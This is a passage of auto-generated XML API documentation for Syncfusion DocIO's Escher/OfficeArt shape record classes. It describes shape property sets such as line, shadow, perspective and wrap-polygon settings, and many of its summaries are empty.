        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtOPT.Clone">
            <summary>
            
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtOPT.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtOPT.GetPropertyValue(System.Int32)">
            <summary>
            Get uint property value by key
            </summary>
            <param name="key"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtOPT.SetPropertyValue(System.Int32,System.UInt32)">
            <summary>
            Sets the property value.
            </summary>
            <param name="key">The key.</param>
            <param name="value">The value.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtOPT.GetComplexPropValue(System.Int32)">
            <summary>
            Get complex value by key.
            </summary>
            <param name="key"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtOPT.CountInstanceValue">
            <summary>
            
            </summary>
            <returns></returns>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtOPT.LineProperties">
            <summary>
            Gets the line properties.
            </summary>
            <value>The line properties.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtOPT.WrapPolygonVertices">
            <summary>
            Gets the wrap polygon vertices.
            </summary>
            <value>
            The wrap polygon vertices.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtOPT.Pib">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtOPT.Txid">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtOPT.Properties">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtOPT.LayoutInTableCell">
            <summary>
            Gets or sets the layout in table cell.
            </summary>
            <value>The layout in table cell.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtOPT.AllowInTableCell">
            <summary>
            Gets/sets a value indicating whether allow in table cell.
            </summary>
            <value><c>true</c> if allow in table cell; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtOPT.AllowOverlap">
            <summary>
            Gets or sets a value indicating whether this textbox can overlap other textboxes.
            </summary>
            <value>
               <c>true</c> if allow the textbox to overlap other textboxes; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtOPT.Visible">
            <summary>
            Gets or sets a value indicating whether this <see cref="T:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtOPT"/> is Visible.
            </summary>
            <value>
              <c>true</c> if hidden; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtOPT.DistanceFromBottom">
            <summary>
            Gets or sets the distance from bottom.
            </summary>
            <value>
            The distance from bottom.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtOPT.DistanceFromLeft">
            <summary>
            Gets or sets the distance from left.
            </summary>
            <value>
            The distance from left.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtOPT.DistanceFromRight">
            <summary>
            Gets or sets the distance from right.
            </summary>
            <value>
            The distance from right.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtOPT.DistanceFromTop">
            <summary>
            Gets or sets the distance from top.
            </summary>
            <value>
            The distance from top.
            </value>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.FOPTETransform">
            <summary>
            
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.FOPTEProtection">
            <summary>
            Changes the behavior of a shape by restricting direct manipulation.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.FOPTEText">
            <summary>
            How text fits in a shape. Text is host-dependent, so some hosts may ignore 
            some of these properties.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.FOPTEGeoText">
            <summary>
            Effect text of the shape - this is what the WordArt tools use, and is separate from 
            the attached text present in ordinary textboxes. Theoretically, a shape could have 
            both (a WordArt with attached text), but this is not currently allowed by the UI. 
            Note that font information is provided here. The default text size is in points, 
            the text effect geometry interfaces require the device size of a point to interpret this. 
            The default point size is a 16.16 fixed-point number. A text effect is present 
            if the fGText boolean is set and either the gtextUNICODE (UNICODE) or gtextRTF (RTF) 
            is present, the UNICODE string takes precedence, however it cannot include any additional 
            font information (unlike the RTF). 
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.FOPTEBlip">
            <summary>
            How a BLIP fits into a shape. This includes cropping information as well as 
            picture display modifications such as brightness and contrast. 
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.FOPTEGeometry">
            <summary>
            The geometry of the shape. Typically, these properties reside in a shape type definition, 
            and so are not written to the file. However, freeform shapes drawing using the polygon 
            tools set the pVertices and pSegmentInfo properties to define their geometries. 
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.FOPTEFillStyle">
            <summary>
            Two main colors are defined - a foreground color and a background color. 
            Different fillTypes use these values differently. In addition to the foreground 
            and background any number of shade colors can be defined. Each shade color 
            is associated with a "position" which says how far into the shade the color appears 
            � colors must be given in position order. 
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.FOPTELineStyle">
            <summary>
            Lines are centered about the infinitely thin proto-line along which they are drawn. 
            Complex dash effects are supported only for simple lines (e.g. changing the end cap) - 
            defaults should be used for other line styles. The line width is in EMUs; a line width 
            of zero should not be used - there is no logical interpretation on a high-resolution printer. 
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.FOPTEShadowStyle">
            <summary>
            The interpretation of the transform properties depends on the type of shadow: 
            msoshadowOffset, msoshadowDouble: 
            Only the offset is used. It is interpreted as an absolute offset expressed in EMUs. 
            The default corresponds to 1/36" in both X and Y (2 or 3 pixels on screen depending on 
            monitor resolution). The offset is relative to the drawing axes (as msoshadowDrawing below, 
            not msoshadowRich) so a shadow offset to the bottom right of the drawing is still offset 
            (by the same amount) to the bottom right if the shape is rotated. The "double" case causes 
            two shadows to be drawn, the first (lower) at the second offset and in the shadowHighlightColor. 
            If the second offset is 0,0 it defaults to being the inverse of the first. 
            msoshadowRich: 
            The offsets and transformation properties are in absolute units measured relative to the shape 
            on the drawing - the shadow moves with the shape, but anisotropic scaling of the shape 
            changes the proportions of the shadow, not its angles. Compare with the following where 
            such scaling scales the shadow in proportion too, thus changes the angle between (e.g.) 
            a vertical line in the shape and it's shadow. 
            msoshadowShape: 
            The offsets and transformation properties are relative to the shape; 1.0 corresponds 
            to the shape width/height as appropriate. The shadow is cast relative to the shape 
            then scaled with the shape, so it moves with the shape. The units are simple numbers 
            (ratios of the G unit space effectively). This transformation type is unnatural in real 
            world terms, but behaves nicely in geometric terms. The offset elements of the property 
            set are treated as fixed-point 16.16 values. 
            msoshadowDrawing: 
            A rich shadow cast onto a plane in drawing space. The transform is applied to the drawing 
            coordinates of the shape and is thus expressed in EMUs. This shadow type enables creation 
            of shadows from multiple objects, however the shadows may overlap higher (different) 
            objects if the shadow plane and shape drawing planes overlap on the screen. 
            The shadowWeight parameter is used as in the perspective property set to apply addiitonal 
            scaling to the perspective parameters - these are divided by the weight. 
            Shadow transformations are independent of the perspective transformation applied to a shape - 
            either hte perspective transformation or the shadow transformation is used as appropriate. 
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.FOPTEPerspectiveStyle">
            <summary>
            Perspective Style
            This is just a 2D transformation matrix (3x3). Specifying peculiar values will cause 
            the shape to render completely outside its geometry - normally clients will constrain 
            the values to get reasonable results. The transformation may be applied at various 
            times as the geometry is processed, this affects the behavior of the perspective 
            which results in the same way as the corresponding shadow perspective types. 
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.FOPTE3dObject">
            <summary>
            3D Object
            Material properties of a 3D object. A 3D effect overrides the fill and line effects 
            and corresponding colors. Extrusion depths are always specified in absolute units. 
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.FOPTE3dStyle">
            <summary>
            3D Style
            Properties of a 3D view; note that distances are in drawing units. 
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.FOPTEShape">
            <summary>
            Shape
            Miscellaneous properties of a single shape which do not apply to group shapes.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.FOPTECallout">
            <summary>
            Callout
            Properties of a callout shape. 
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.FOPTEGroupShape">
            <summary>
            Group Shape
            Miscellaneous shape properties that can apply to group shapes.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.msofbtRGFOPTE">
             <summary>
            
             </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.msofbtRGFOPTE.DEF_TXID">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.msofbtRGFOPTE.m_prevPid">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.msofbtRGFOPTE.#ctor">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.msofbtRGFOPTE.Add(Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.FOPTEBase)">
            <summary>
            
            </summary>
            <param name="fopteBase"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.msofbtRGFOPTE.Write(System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="stream"></param>
            <returns>Count of bytes written.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.msofbtRGFOPTE.Read(System.IO.Stream,System.Int32)">
            <summary>
            
            </summary>
            <param name="stream"></param>
            <param name="length"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.msofbtRGFOPTE.GetPostProps">
            <summary>
            
            </summary>
            <returns></returns>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSecondaryFOPT">
            <summary>
            Summary description for MsofbtSecondaryFOPT - OfficeArtSecondaryFOPT.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSecondaryFOPT.m_prop">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSecondaryFOPT.#ctor(Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSecondaryFOPT"/> class.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSecondaryFOPT.ReadRecordData(System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="stream"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSecondaryFOPT.WriteRecordData(System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="stream"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSecondaryFOPT.Clone">
            <summary>
            
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSecondaryFOPT.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSecondaryFOPT.GetPropertyValue(System.Int32)">
            <summary>
            Get uint property value by key
            </summary>
            <param name="key"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSecondaryFOPT.GetComplexPropValue(System.Int32)">
            <summary>
            Get complex value by key.
            </summary>
            <param name="key"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSecondaryFOPT.CountInstanceValue">
            <summary>
            Counts the instance value.
            </summary>
            <returns></returns>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSecondaryFOPT.Properties">
            <summary>
            Gets or sets the properties.
            </summary>
            <value>The properties.</value>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtTertiaryFOPT">
            <summary>
            Summary description for MsofbtTertiaryFOPT - OfficeArtTertiaryFOPT.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtTertiaryFOPT.#ctor(Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtTertiaryFOPT"/> class.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtTertiaryFOPT.ReadRecordData(System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="stream"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtTertiaryFOPT.WriteRecordData(System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="stream"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtTertiaryFOPT.Clone">
            <summary>
            Clone current record.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtTertiaryFOPT.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtTertiaryFOPT.GetPropertyValue(System.Int32)">
            <summary>
            Get uint property value by key
            </summary>
            <param name="key"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtTertiaryFOPT.SetPropertyValue(System.Int32,System.UInt32)">
            <summary>
            Sets the property value.
            </summary>
            <param name="key">The key.</param>
            <param name="value">The value.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtTertiaryFOPT.GetComplexPropValue(System.Int32)">
            <summary>
            Get complex value by key.
            </summary>
            <param name="key"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtTertiaryFOPT.CountInstanceValue">
            <summary>
            Counts the instance value.
            </summary>
            <returns></returns>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtTertiaryFOPT.LineProperties">
            <summary>
            Gets the line properties.
            </summary>
            <value>The line properties.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtTertiaryFOPT.WrapPolygonVertices">
            <summary>
            Gets the wrap polygon vertices.
            </summary>
            <value>
            The wrap polygon vertices.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtTertiaryFOPT.Properties">
            <summary>
            Gets or sets the properties.
            </summary>
            <value>The properties.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtTertiaryFOPT.XAlign">
            <summary>
            Gets or sets the X align.
            </summary>
            <value>The X align.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtTertiaryFOPT.XRelTo">
            <summary>
            Gets or sets the X rel to.
            </summary>
            <value>The X rel to.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtTertiaryFOPT.YAlign">
            <summary>
            Gets or sets the Y align.
            </summary>
            <value>The Y align.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtTertiaryFOPT.YRelTo">
            <summary>
            Gets or sets the Y rel to.
            </summary>
            <value>The Y rel to.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtTertiaryFOPT.LayoutInTableCell">
            <summary>
            Gets or sets the layout in table cell.
            </summary>
            <value>The layout in table cell.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtTertiaryFOPT.Unknown1">
            <summary>
            Gets or sets the unknown1.
            </summary>
            <value>The unknown1.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtTertiaryFOPT.Unknown2">
            <summary>
            Gets or sets the unknown2.
            </summary>
            <value>The unknown2.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtTertiaryFOPT.AllowInTableCell">
            <summary>
            Gets/sets a value indicating whether allow in table cell.
            </summary>
            <value><c>true</c> if allow in table cell; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtTertiaryFOPT.AllowOverlap">
            <summary>
            Gets or sets a value indicating whether this textbox can overlap other textboxes.
            </summary>
            <value>
              <c>true</c> if allow the textbox to overlap other textboxes; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtTertiaryFOPT.Visible">
            <summary>
            Gets or sets a value indicating whether this <see cref="T:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtTertiaryFOPT"/> is Visible.
            </summary>
            <value>
              <c>true</c> if hidden; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.LineStyleBooleanProperties">
            <summary>
            Summary description for LineStyleBooleanProperties
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.LineStyleBooleanProperties.#ctor(Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.msofbtRGFOPTE,System.Int32)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.LineStyleBooleanProperties"/> class.
            </summary>
            <param name="prop">The prop.</param>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.LineStyleBooleanProperties.HasDefined">
            <summary>
            Gets a value indicating whether this instance has defined.
            </summary>
            <value>
            	<c>true</c> if this instance has defined; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.LineStyleBooleanProperties.PenAlignInset">
            <summary>
            Gets or sets a value indicating whether [pen align inset].
            </summary>
            <value><c>true</c> if [pen align inset]; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.LineStyleBooleanProperties.UsefLineOpaqueBackColor">
            <summary>
            Gets or sets a value indicating whether [usef line opaque back color].
            </summary>
            <value>
            	<c>true</c> if [usef line opaque back color]; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.LineStyleBooleanProperties.UsefInsetPen">
            <summary>
            Gets or sets a value indicating whether [usef inset pen].
            </summary>
            <value><c>true</c> if [usef inset pen]; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.LineStyleBooleanProperties.UsefInsetPenOK">
            <summary>
            Gets or sets a value indicating whether [usef inset pen OK].
            </summary>
            <value><c>true</c> if [usef inset pen OK]; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.LineStyleBooleanProperties.UsefArrowheadsOK">
            <summary>
            Gets or sets a value indicating whether [usef arrowheads OK].
            </summary>
            <value><c>true</c> if [usef arrowheads OK]; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.LineStyleBooleanProperties.UsefLine">
            <summary>
            Gets or sets a value indicating whether [usef line].
            </summary>
            <value><c>true</c> if [usef line]; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.LineStyleBooleanProperties.UsefHitTestLine">
            <summary>
            Gets or sets a value indicating whether [usef hit test line].
            </summary>
            <value><c>true</c> if [usef hit test line]; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.LineStyleBooleanProperties.UsefLineFillShape">
            <summary>
            Gets or sets a value indicating whether [usef line fill shape].
            </summary>
            <value><c>true</c> if [usef line fill shape]; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.LineStyleBooleanProperties.UsefNoLineDrawDash">
            <summary>
            Gets or sets a value indicating whether [usef no line draw dash].
            </summary>
            <value>
            	<c>true</c> if [usef no line draw dash]; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.LineStyleBooleanProperties.LineOpaqueBackColor">
            <summary>
            Gets or sets a value indicating whether [line opaque back color].
            </summary>
            <value>
            	<c>true</c> if [line opaque back color]; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.LineStyleBooleanProperties.InsetPen">
            <summary>
            Gets or sets a value indicating whether [inset pen].
            </summary>
            <value><c>true</c> if [inset pen]; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.LineStyleBooleanProperties.InsetPenOK">
            <summary>
            Gets or sets a value indicating whether [inset pen OK].
            </summary>
            <value><c>true</c> if [inset pen OK]; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.LineStyleBooleanProperties.ArrowheadsOK">
            <summary>
            Gets or sets a value indicating whether [arrowheads OK].
            </summary>
            <value><c>true</c> if [arrowheads OK]; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.LineStyleBooleanProperties.Line">
            <summary>
            Gets or sets a value indicating whether this <see cref="T:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.LineStyleBooleanProperties"/> is line.
            </summary>
            <value><c>true</c> if line; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.LineStyleBooleanProperties.HitTestLine">
            <summary>
            Gets or sets a value indicating whether [hit test line].
            </summary>
            <value><c>true</c> if [hit test line]; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.LineStyleBooleanProperties.LineFillShape">
            <summary>
            Gets or sets a value indicating whether [line fill shape].
            </summary>
            <value><c>true</c> if [line fill shape]; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.LineStyleBooleanProperties.NoLineDrawDash">
            <summary>
            Gets or sets a value indicating whether [no line draw dash].
            </summary>
            <value><c>true</c> if [no line draw dash]; otherwise, <c>false</c>.</value>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.WrapPolygonVertices">
            <summary>
            Wrap Polygon Vertices class
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.WrapPolygonVertices.#ctor(Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.msofbtRGFOPTE,System.Int32)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.LineStyleBooleanProperties"/> class.
            </summary>
            <param name="prop">The prop.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.WrapPolygonVertices.readArrayData">
            <summary>
            Reads the array data.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.WrapPolygonVertices.Coords">
            <summary>
            Gets or sets the coords.
            </summary>
            <value>
            The coords.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.WrapPolygonVertices.nElems">
            <summary>
            Gets or sets the number of array elements that are contained in this record.
            </summary>
            <value>
            The n elems.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.WrapPolygonVertices.nElemsAlloc">
            <summary>
            Gets or sets the maximum number of array elements that this record can contain.
            </summary>
            <value>
            The n elems alloc.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.WrapPolygonVertices.cbElem">
            <summary>
            Gets or sets the size, in bytes, of each element in the data array.
            </summary>
            <value>
            The cb elem.
            </value>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSolverContainer">
            <summary>
            Solver Container msofbtSolverContainer
            Rules give special behaviors to shapes. Rules can govern a single shape, like in the case of a 
            callout shape, or multiple shapes, as in the case of connectors. 
            Each drawing can have a list of rules associated with it.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSolverContainer.#ctor(Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSp">
            <summary>
            The instance field of the record header contains the shape type; 
            the record itself contains the shape ID and a group of persistent flags.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSp.m_shapeId">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSp.#ctor(Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSp.ReadRecordData(System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="stream"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSp.WriteRecordData(System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="stream"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSp.Clone">
            <summary>
            
            </summary>
            <returns></returns>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSp.IsGroup">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSp.IsChild">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSp.IsPatriarch">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSp.IsDeleted">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSp.IsOle">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSp.HasMaster">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSp.IsFlippedHor">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSp.IsFlippedVert">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSp.IsConnector">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSp.HasAnchor">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSp.IsBackground">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSp.HasShapeTypeProperty">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSp.ShapeId">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSp.ShapeType">
            <summary>
            
